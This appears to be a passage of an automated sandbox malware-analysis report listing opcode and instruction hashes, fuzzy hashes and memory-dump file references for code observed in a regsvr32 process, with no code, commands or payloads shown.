                                                                              • API String ID:
                                                                              • Opcode ID: b234927cee6b990ba8f10ac4265acf47dba1ddaff3d34dfbc7857ed9639441f3
                                                                              • Instruction ID: f34fa22b635a4afa35a0659c90a3803867b76daefefc6092729da399bb45924c
                                                                              • Opcode Fuzzy Hash: b234927cee6b990ba8f10ac4265acf47dba1ddaff3d34dfbc7857ed9639441f3
                                                                              • Instruction Fuzzy Hash: E8127270A18A298BDB58EF18C8A56B8FBE1FF58704F0401B9D05DF3295DE34E941CB96
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 45fec199abab14a237b100f2b25c031120b2216a15823bf5aba9dfd8056b3230
                                                                              • Instruction ID: 2aff526f7b0d08226afcca3512499da4ec249daf1f46484db44c8771cbe60799
                                                                              • Opcode Fuzzy Hash: 45fec199abab14a237b100f2b25c031120b2216a15823bf5aba9dfd8056b3230
                                                                              • Instruction Fuzzy Hash: 27029761A1895A8BEB98EB28C4B56B8F6D2FF54304F4401B9D05EF32D7CD28E841C7A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 262902e84c569724d51e2a7eff18aba60715da07c74f74290eda898fb4e8d9fa
                                                                              • Instruction ID: e1c851b903eb54cd3cd162380fe009009a03e6b578ea1652dbd30a8ee528e196
                                                                              • Opcode Fuzzy Hash: 262902e84c569724d51e2a7eff18aba60715da07c74f74290eda898fb4e8d9fa
                                                                              • Instruction Fuzzy Hash: F2E1A461E1C96B8BEB58EF28D8A16B9BBD1FF45714F040179D01DF31C6CE28A801CBA5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 561f964b3643ce8e2ecfb1db7259d50655dea32a1a205568348fed9a7983ad9d
                                                                              • Instruction ID: d2918eda5fd5a5b1f070cdcca0ed74f8fa92de618603cc24440ad996bd8758a3
                                                                              • Opcode Fuzzy Hash: 561f964b3643ce8e2ecfb1db7259d50655dea32a1a205568348fed9a7983ad9d
                                                                              • Instruction Fuzzy Hash: AFF18570E18A698BE758EF18C8A56B8FBE1FF58704F0401B9D05DF3296DE34A841CB95
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b16b00a8f1c92a0b527e27eb59d30d023f00dd828db28fdb1a511ba611aa9113
                                                                              • Instruction ID: 52544836a92107ab6ac0050a880a8ee9aab239ce2d715cd510d765e022d86953
                                                                              • Opcode Fuzzy Hash: b16b00a8f1c92a0b527e27eb59d30d023f00dd828db28fdb1a511ba611aa9113
                                                                              • Instruction Fuzzy Hash: 1FB129A2E1865A4AE741FF2CE8F62F87BE2EF51225F4800B7D088EA197CD1C6485C755
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7e656c3cf8aae10d3ccab8215b79571b41823f1a426be7c7ed213301a7c56815
                                                                              • Instruction ID: 2b4e84e922ab69c7ec09bff40cd0d91b9b19c91d1a379ed9bf7205538916a7fc
                                                                              • Opcode Fuzzy Hash: 7e656c3cf8aae10d3ccab8215b79571b41823f1a426be7c7ed213301a7c56815
                                                                              • Instruction Fuzzy Hash: 97B1F561A1C91A4FEB9CEF28C4A66B4BBD2EF95304F440579D05DF31CBDD28A842C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3424b3968f315432b91a62d4dc1a2b8076ac5b33d8d19da0d70b63be8eacd7c2
                                                                              • Instruction ID: 4e0300c5359a67e55b49e8b45c0de2650583341241c3aa81623fb6d6f64a5cfb
                                                                              • Opcode Fuzzy Hash: 3424b3968f315432b91a62d4dc1a2b8076ac5b33d8d19da0d70b63be8eacd7c2
                                                                              • Instruction Fuzzy Hash: D8B18070A1891D8FEB98EB28C495AB9B7E2FF98314F140179D01ED3296DE35F842CB54
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8a3e1edca2e59cc698f6faba5f6b201ab023d6c4b59b10e767f40cb6bc16a383
                                                                              • Instruction ID: 67a980f7cd59d5ba2c2cecdf5624dc46b741cc693b44fb6ed481954d825eaab4
                                                                              • Opcode Fuzzy Hash: 8a3e1edca2e59cc698f6faba5f6b201ab023d6c4b59b10e767f40cb6bc16a383
                                                                              • Instruction Fuzzy Hash: 6B812C72F1CD590FE78CEA2C98A61B4BBD1EF55310B0401BAD44DE31D7ED19AC4287A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1681bd1e9c979d5cc1e1f6d843202e31de3868380271193a445ed952277b185c
                                                                              • Instruction ID: cfb13b600187df14b43bd661b01c4ab5ce77f17c6aff274854549c02de77a77d
                                                                              • Opcode Fuzzy Hash: 1681bd1e9c979d5cc1e1f6d843202e31de3868380271193a445ed952277b185c
                                                                              • Instruction Fuzzy Hash: 768162317089188FDB98EB1CD459B7877E2FF99311F1401AAE44ED72A6CE24EC42CB55
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae9e075e6f52b64644609166c74ecef2f155a0392f4cffadf147cb4375a92341
                                                                              • Instruction ID: f1626e2f7c0a076781400306e4baf525e705fc805eaf1b8d78ac20ac17ab02aa
                                                                              • Opcode Fuzzy Hash: ae9e075e6f52b64644609166c74ecef2f155a0392f4cffadf147cb4375a92341
                                                                              • Instruction Fuzzy Hash: D5711961E1C91A4BE79CFF2884A66B5B7C1EF45314F44017DE45FF31CADD18E8028AA6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b873431347e6d5613282c6f44382fd33ee06557e4386b0379dd6a47cdbc2cfe6
                                                                              • Instruction ID: 70f09f9fb3e40204f7acb3d5c6bd2fcbd4ad98d62abbdc6fafaf18b2b28d081a
                                                                              • Opcode Fuzzy Hash: b873431347e6d5613282c6f44382fd33ee06557e4386b0379dd6a47cdbc2cfe6
                                                                              • Instruction Fuzzy Hash: F6613C61A1CA6A4BF748BF2894F61F9BBC2EF55325B04017AD44DF71C7DC08A84287A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b4d84273c6bf4ee85f8d7984e8e9be43c28dd297e3c18903b45936976f4d7ba5
                                                                              • Instruction ID: 0fc29e6d4052a436802a858eeb2ef70d62c48f9c5e7c1e29fba5fabdfb626017
                                                                              • Opcode Fuzzy Hash: b4d84273c6bf4ee85f8d7984e8e9be43c28dd297e3c18903b45936976f4d7ba5
                                                                              • Instruction Fuzzy Hash: A4718461F18A1F8FEB98EF2884E56B9FBE1EF58214B040179D00DF31D6DE18E84587A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bb3c91628c0f878b35a692e3aab14937cd4f1a4ea5132914a70db18707e397ed
                                                                              • Instruction ID: 46624ccf70e9a0ea8f35074bc28f46959ec5769d308dd66435d1c7874282ddc4
                                                                              • Opcode Fuzzy Hash: bb3c91628c0f878b35a692e3aab14937cd4f1a4ea5132914a70db18707e397ed
                                                                              • Instruction Fuzzy Hash: 8681E461A1C95A4AEB9CEF28C4B66B4BBD2EF94304F480479D05DF71CBCD28E841C671
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0bf507ebb0111d8074aff13c02b303faebe9906eb9699c8cccdad0b654dc2ded
                                                                              • Instruction ID: fe885ebd7973a2aaf675f538eb11b6e3ef5286a3e5863767fcb40aa5eb0e466c
                                                                              • Opcode Fuzzy Hash: 0bf507ebb0111d8074aff13c02b303faebe9906eb9699c8cccdad0b654dc2ded
                                                                              • Instruction Fuzzy Hash: 87716E30A1891A9FEB84EB18C495B68B7E2FF98314F144179D01ED36DADE29FC42CB54
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 518ffeced1f7d6471f17a222c7b2e2f4482783a88d62499e7cfdba3763bd781f
                                                                              • Instruction ID: 90feddc798d271a6b7fd9e0fb03ebd60a1293e53fae337118a172189daa6b86b
                                                                              • Opcode Fuzzy Hash: 518ffeced1f7d6471f17a222c7b2e2f4482783a88d62499e7cfdba3763bd781f
                                                                              • Instruction Fuzzy Hash: DB515431618E1E4BE768DA18D895570B7E0EFA4314B14027DC45ED32E6EE29F883C7A4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bbfd25ed8231ee0af5dd246b842023d78c89b72a3dfc3e55a80d6c187ad8b943
                                                                              • Instruction ID: fbddb0ad421e5f4099a4a512cdecf65ae76d0268ff3fa79b2d7ba35f2e86b23e
                                                                              • Opcode Fuzzy Hash: bbfd25ed8231ee0af5dd246b842023d78c89b72a3dfc3e55a80d6c187ad8b943
                                                                              • Instruction Fuzzy Hash: 07715071E1891E8FEB98EF18C8A56B9B7E1EF58304F0001B9C05DF3295DE34A981CB65
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2bbb038b445c55598433ef8a750eb6393f8f5aa7a91ec12323a4003afb677419
                                                                              • Instruction ID: 2010e63af6defdfc18c00f27ebd7d379a9df4a413bd7a19a38733adea788ae73
                                                                              • Opcode Fuzzy Hash: 2bbb038b445c55598433ef8a750eb6393f8f5aa7a91ec12323a4003afb677419
                                                                              • Instruction Fuzzy Hash: C8519871A1CA5E8FDB88EE28C8A16B577D1FF95714F0401B9D05EE72C6CE28E811C7A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ebbc4a7b5a7b88026dd3fb85651e3e98bbda467cb79aa3e638e80150e97687f1
                                                                              • Instruction ID: ba2b5282322821d7881e093e947576adb60a4de7edc5f595f1b9ccf632742f13
                                                                              • Opcode Fuzzy Hash: ebbc4a7b5a7b88026dd3fb85651e3e98bbda467cb79aa3e638e80150e97687f1
                                                                              • Instruction Fuzzy Hash: 0A513B77A0866A5BFB01FF2CF4E24F57FD1EF513397180076D0889A0A7DD182096CAA9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dc944549a3263495cb58872e4e16486da50aa54bc4eb44478d48f350fd29a01d
                                                                              • Instruction ID: 2b131f1e21a3500e4e0db44e52c959777c828bf776e95f6e1ca95d2a812da5e8
                                                                              • Opcode Fuzzy Hash: dc944549a3263495cb58872e4e16486da50aa54bc4eb44478d48f350fd29a01d
                                                                              • Instruction Fuzzy Hash: 6D51E6A1E1895E4FFB84EB5CD8A57E9BBE2FF44300F44027AD009E32D6DE686841C714
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 679728fc03aaa049c8fee3b9e20831e0c317f325c810a060043b3d696af7b7ff
                                                                              • Instruction ID: 29f983522a1afa4d3fb6863d292ef0445671a329dbcda567b2da1f451f64804c
                                                                              • Opcode Fuzzy Hash: 679728fc03aaa049c8fee3b9e20831e0c317f325c810a060043b3d696af7b7ff
                                                                              • Instruction Fuzzy Hash: 42511F21B2CE2A4BDB58B61C94A6675F7D2FF94704F040179E44DE32C6DD18FC0186E6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6c28a87c7a22b8cc6519234a818df2fde10e5e38cec52656d808a450398f336
                                                                              • Instruction ID: 2fc328811b6ac4c7a7319da8520983f754d86d632b795dd413d45b3307611bb9
                                                                              • Opcode Fuzzy Hash: d6c28a87c7a22b8cc6519234a818df2fde10e5e38cec52656d808a450398f336
                                                                              • Instruction Fuzzy Hash: 2251FE71A1895D8FFB94EB1CC4A4BA8BBE2EF98310F1501B5E01DD72A5DE34AC81DB14
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d9146dddf7fed6814d9f7d76854385de3de4c2efacf76c1d71452df433653954
                                                                              • Instruction ID: 62b496f2240d8e3699b92e3bd327abf029f3f933b06335165cdba0cdbcd2c77a
                                                                              • Opcode Fuzzy Hash: d9146dddf7fed6814d9f7d76854385de3de4c2efacf76c1d71452df433653954
                                                                              • Instruction Fuzzy Hash: F951F62194D6DA0FF796877884603A5BFE2AF86220F0945FBC089DB1CBCD6D5846D371
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 120a1b09414cc6f2ac69589d20b095cd93b17bf3a47612a3ed12823af5fdd877
                                                                              • Instruction ID: 123e408c10e9805297217582a85d680078c40dcb9fde849b785715985f58b9c8
                                                                              • Opcode Fuzzy Hash: 120a1b09414cc6f2ac69589d20b095cd93b17bf3a47612a3ed12823af5fdd877
                                                                              • Instruction Fuzzy Hash: CA41E811B1C95E8BE788FA2898F46B9FAC1FF54614F48017AD00DF32DACD18E841C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3605fcf634e884a98b25f47af3ba334009ed8c6a78781c633d4ea17380a2c37
                                                                              • Instruction ID: bb2c4841366aaf6b6919c1f22ffe450e9fbc3ca89f223199a35abea4819124eb
                                                                              • Opcode Fuzzy Hash: d3605fcf634e884a98b25f47af3ba334009ed8c6a78781c633d4ea17380a2c37
                                                                              • Opcode Fuzzy Hash: ca23309cf7f4a25a02fcf3dd2185d89b5d15cfef8a1cc67e8be198dad0ac5026
                                                                              • Instruction Fuzzy Hash: 4E31A972E14E9E4BDB84EB2CD8A62F8BBE1FF54214B440176D01DE3186DE2898419765
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 35f36d8aac30a3613ea4fe0b8d729bd192bfe2fa18e7b13df105058777ff2b4b
                                                                              • Instruction ID: 96cf55e198c7a16ca05f1953df4ee0f565dc62500376c3d7171d9f66f134ce58
                                                                              • Opcode Fuzzy Hash: 35f36d8aac30a3613ea4fe0b8d729bd192bfe2fa18e7b13df105058777ff2b4b
                                                                              • Instruction Fuzzy Hash: 55214B71A0CA5D4FD705AB2C9C695B97FE0EF55221708027FD048D72D3CE189846C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2dcef6df263397c5bad19d7e826f1b47e9ab7ce3869e55dbd2ab986753d728e1
                                                                              • Instruction ID: cf546138a8ab0e11e859093caf4908e43f2b8c1866c6a032c90964a158426157
                                                                              • Opcode Fuzzy Hash: 2dcef6df263397c5bad19d7e826f1b47e9ab7ce3869e55dbd2ab986753d728e1
                                                                              • Instruction Fuzzy Hash: 5F21095291DADA4FFB95E72888B11A4BFE1FF15610B0905FAC088E70DBC90C9804D766
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 006f651036cfa1eb580786ee5287aa5a7601873715a8ed202bff323c3066d230
                                                                              • Instruction ID: 60c704608639e1e1ff45cc2a1c4d342341513bf5006fd03ad69019ec1b815765
                                                                              • Opcode Fuzzy Hash: 006f651036cfa1eb580786ee5287aa5a7601873715a8ed202bff323c3066d230
                                                                              • Instruction Fuzzy Hash: 20214661A1D85E9FEB44EB2CD8A82B8FFA1EF49204F0402BAD01CE31D6CD146844C7A6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4f8e16344261a4b2b19df1b8b88e3b42c0f0fa57787eddb7e3d90a466d671952
                                                                              • Instruction ID: e6f1a3a6449df9d3cbbf7ca4eb7ff5550a2924cc986d516fe78e4f2403ff1335
                                                                              • Opcode Fuzzy Hash: 4f8e16344261a4b2b19df1b8b88e3b42c0f0fa57787eddb7e3d90a466d671952
                                                                              • Instruction Fuzzy Hash: 7131F371C189CDAFEB59DB28C8A90A8FFE0FF00318B4441AAC06997497EE246540CB55
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c4f0f2b2c221ed71984a6ec611ef389858501c4a9d355dbe9ec158ef388cb49
                                                                              • Instruction ID: 23b41e2ee13acbfd48e997a5a083fb0d134281368c790e5accc9b262abe3ac46
                                                                              • Opcode Fuzzy Hash: 3c4f0f2b2c221ed71984a6ec611ef389858501c4a9d355dbe9ec158ef388cb49
                                                                              • Instruction Fuzzy Hash: 44210861A1C95A9BEB48FB288465279F6D2FF46314F040579E05EF31CACE2CA441C7A7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9aaf72afbe3cf071382128231413ca40842ac4ca8754275656b70e6d86034d9b
                                                                              • Instruction ID: 8df0b6af976b5cac74ab8fe309b8db8ecc31bd0862e89ffa7a75bb10eabe721d
                                                                              • Opcode Fuzzy Hash: 9aaf72afbe3cf071382128231413ca40842ac4ca8754275656b70e6d86034d9b
                                                                              • Instruction Fuzzy Hash: 2511E752A1C96A4BE755E62CE8F15F9ABD1EFD122074800B7E05DE608BDD08A846C2B5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73c74e332d9e71b4f6765b42565fe967555236ae9a43dfeaf5da46332c909a57
                                                                              • Instruction ID: 63a253f76ca4a045b04341145c2302d0d90130d4db5d41c54a36dfe665daee6a
                                                                              • Opcode Fuzzy Hash: 73c74e332d9e71b4f6765b42565fe967555236ae9a43dfeaf5da46332c909a57
                                                                              • Instruction Fuzzy Hash: 4611A561E1C95D9FDB54E75888A19B8FBE1FF48714B0401B5E00DE3196CE18A8409BE6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8a1755bb43beed5f0bb05bd72012c876718342d6ae6b68a398cf5975a04fea58
                                                                              • Instruction ID: 3b9b667b81ceec131780d79bd7a0b277e08fccb583291fc0c0d3e08da5a5651f
                                                                              • Opcode Fuzzy Hash: 8a1755bb43beed5f0bb05bd72012c876718342d6ae6b68a398cf5975a04fea58
                                                                              • Instruction Fuzzy Hash: A711E01144E7D60BE35393749865191BFE1AE83220B0D01EBD484CF0E7D94E988AC376
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9f0089848ff48e9731ce4f5e4744735d8ddbe0d64341f2d7a8ab5239136c28ac
                                                                              • Instruction ID: e3ff44b5b30dc6430b96500b1a03939aa409636680771f6001e389ed59e1996d
                                                                              • Opcode Fuzzy Hash: 9f0089848ff48e9731ce4f5e4744735d8ddbe0d64341f2d7a8ab5239136c28ac
                                                                              • Instruction Fuzzy Hash: E2112C71A18D5D5FDB58EB2C886D679BAE1FF98311B04027FE00DE32E5CE2098418795
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 603dc4b2f56774c3463bce5f6750201d42047d9c7c7fc597d5c8f527cb1044f7
                                                                              • Instruction ID: 095c460fdac0e59562f57fda054bb57d768749f2146bdb620525348b41aea65c
                                                                              • Opcode Fuzzy Hash: 603dc4b2f56774c3463bce5f6750201d42047d9c7c7fc597d5c8f527cb1044f7
